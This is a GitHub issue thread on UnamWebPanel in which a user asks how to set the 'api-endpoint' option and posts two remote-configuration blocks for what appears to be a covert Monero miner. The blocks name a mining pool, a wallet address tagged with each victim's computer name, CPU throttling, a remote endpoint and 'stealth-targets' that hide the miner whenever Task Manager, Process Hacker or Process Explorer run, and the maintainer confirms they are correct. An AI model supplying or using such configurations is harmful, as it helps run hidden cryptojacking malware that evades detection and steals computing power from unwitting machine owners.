### ISSUE TITLE
Yes you can set it using the `"api-endpoint": "API Endpoint URL"` option inside the configuration.

### ISSUE THREAD

**Issue by DARK-DEVIL-66** [UnamSanctam/UnamWebPanel#296]
Yes you can set it using the `"api-endpoint": "API Endpoint URL"` option inside the configuration.

_Originally posted by @UnamSanctam in https://github.com/UnamSanctam/UnamWebPanel/issues/291#issuecomment-1791788020_
            

wich configration u mean remote configration i am rigth ?

**Comment by UnamSanctam** [comment]
Yes, it works in both technically but it's really meant for the "Remote Configuration",

**Comment by DARK-DEVIL-66** [comment]
it's rigth

{
    "algo": "rx/0",
    "pool": "xmr.2miners.com",
    "port": 12222,
    "wallet": "4B9ttGq1dRJgqmnGJ6HLeZ7VhdTxvQS67Nb4FiN5CXKNNy6mJnYvTSzdyXxrfUF1mcEx4VzqzA4mBRSDxCf6aCyL1D2hSnC.{COMPUTERNAME}",
    "password": "x",
    "nicehash": false,
    "ssltls": true,
    "max-cpu": 20,
    "idle-wait": 5,
    "idle-cpu": 80,
    "api-endpoint": "https://rentry.co/ku5wwe/raw"
    "stealth-targets": "Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe",
    "kill-targets": "",
    "stealth-fullscreen": false
}

**Comment by DARK-DEVIL-66** [comment]
it's rigth or wrong?

{
    "algo": "rx/0",
    "pool": "xmr.2miners.com",
    "port": 12222,
    "wallet": "4B9ttGq1dRJgqmnGJ6HLeZ7VhdTxvQS67Nb4FiN5CXKNNy6mJnYvTSzdyXxrfUF1mcEx4VzqzA4mBRSDxCf6aCyL1D2hSnC.{COMPUTERNAME}",
    "password": "x",
    "nicehash": false,
    "ssltls": true,
    "max-cpu": 20,
    "idle-wait": 5,
    "idle-cpu": 80,
    "api-endpoint": "http://google.com.com/api/endpoint.php"
    "stealth-targets": "Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe",
    "kill-targets": "",
    "stealth-fullscreen": false
}

**Comment by UnamSanctam** [comment]
>it's rigth or wrong?

Yes exactly, that's correct.
